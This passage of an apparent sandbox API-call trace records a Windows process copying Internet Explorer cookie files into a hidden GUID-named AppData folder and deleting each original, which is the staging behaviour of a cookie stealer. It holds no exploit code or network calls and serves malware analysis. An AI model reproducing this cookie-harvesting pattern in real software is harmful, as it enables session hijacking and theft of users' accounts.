returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.604] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 1 [0251.604] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.604] StrChrW (lpStart="0GHTMU6X.txt", wMatch=0x74c005c) returned 0x0 [0251.604] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="0GHTMU6X.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\0GHTMU6X.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\0GHTMU6X.txt" [0251.604] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\0GHTMU6X.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\0ghtmu6x.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\0GHTMU6X.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\0ghtmu6x.txt"), bFailIfExists=0) returned 1 [0251.612] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\0GHTMU6X.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\0ghtmu6x.txt")) returned 1 [0251.637] lstrlenW (lpString="Low\\0MDKR34W.txt") returned 16 [0251.637] lstrlenW (lpString="\\cookie.ie") returned 10 [0251.637] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.638] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.638] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.638] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.638] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.638] StrChrW (lpStart="Low\\0MDKR34W.txt", wMatch=0x74c005c) returned="\\0MDKR34W.txt" [0251.638] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.638] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.638] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.638] StrChrW (lpStart="0MDKR34W.txt", wMatch=0x74c005c) returned 0x0 [0251.638] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="0MDKR34W.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\0MDKR34W.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\0MDKR34W.txt" [0251.638] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\0MDKR34W.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\0mdkr34w.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\0MDKR34W.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\0mdkr34w.txt"), bFailIfExists=0) returned 1 [0251.645] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\0MDKR34W.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\0mdkr34w.txt")) returned 1 [0251.646] lstrlenW (lpString="Low\\0Z1JIEVI.txt") returned 16 [0251.646] lstrlenW (lpString="\\cookie.ie") returned 10 [0251.646] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.646] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.646] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.646] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.646] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.646] StrChrW (lpStart="Low\\0Z1JIEVI.txt", wMatch=0x74c005c) returned="\\0Z1JIEVI.txt" [0251.646] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.646] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.646] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.646] StrChrW (lpStart="0Z1JIEVI.txt", wMatch=0x74c005c) returned 0x0 [0251.646] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="0Z1JIEVI.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\0Z1JIEVI.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\0Z1JIEVI.txt" [0251.646] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\0Z1JIEVI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\0z1jievi.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\0Z1JIEVI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\0z1jievi.txt"), bFailIfExists=0) returned 1 [0251.652] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\0Z1JIEVI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\0z1jievi.txt")) returned 1 [0251.653] lstrlenW (lpString="Low\\16DOE15M.txt") returned 16 [0251.653] lstrlenW (lpString="\\cookie.ie") returned 10 [0251.653] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.653] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.653] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.653] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.653] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.653] StrChrW (lpStart="Low\\16DOE15M.txt", wMatch=0x74c005c) returned="\\16DOE15M.txt" [0251.653] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.653] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.653] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.653] StrChrW (lpStart="16DOE15M.txt", wMatch=0x74c005c) returned 0x0 [0251.653] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="16DOE15M.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\16DOE15M.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\16DOE15M.txt" [0251.653] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\16DOE15M.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\16doe15m.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\16DOE15M.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\16doe15m.txt"), bFailIfExists=0) returned 1 [0251.658] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\16DOE15M.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\16doe15m.txt")) returned 1 [0251.659] lstrlenW (lpString="Low\\16Y0X4V7.txt") returned 16 [0251.659] lstrlenW (lpString="\\cookie.ie") returned 10 [0251.659] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.659] lstrcpyW (in: lpString1=0x79c8960, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.659] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.659] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.659] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.659] StrChrW (lpStart="Low\\16Y0X4V7.txt", wMatch=0x74c005c) returned="\\16Y0X4V7.txt" [0251.659] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.659] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.659] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.659] StrChrW (lpStart="16Y0X4V7.txt", wMatch=0x74c005c) returned 0x0 [0251.659] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="16Y0X4V7.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\16Y0X4V7.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\16Y0X4V7.txt" [0251.659] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\16Y0X4V7.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\16y0x4v7.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\16Y0X4V7.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\16y0x4v7.txt"), bFailIfExists=0) returned 1 [0251.696] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\16Y0X4V7.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\16y0x4v7.txt")) returned 1 [0251.759] lstrlenW (lpString="Low\\1L3KU69N.txt") returned 16 [0251.759] lstrlenW (lpString="\\cookie.ie") returned 10 [0251.759] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.759] lstrcpyW (in: lpString1=0x79c8960, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.759] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.759] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.759] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.759] StrChrW (lpStart="Low\\1L3KU69N.txt", wMatch=0x74c005c) returned="\\1L3KU69N.txt" [0251.759] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.759] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.759] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") 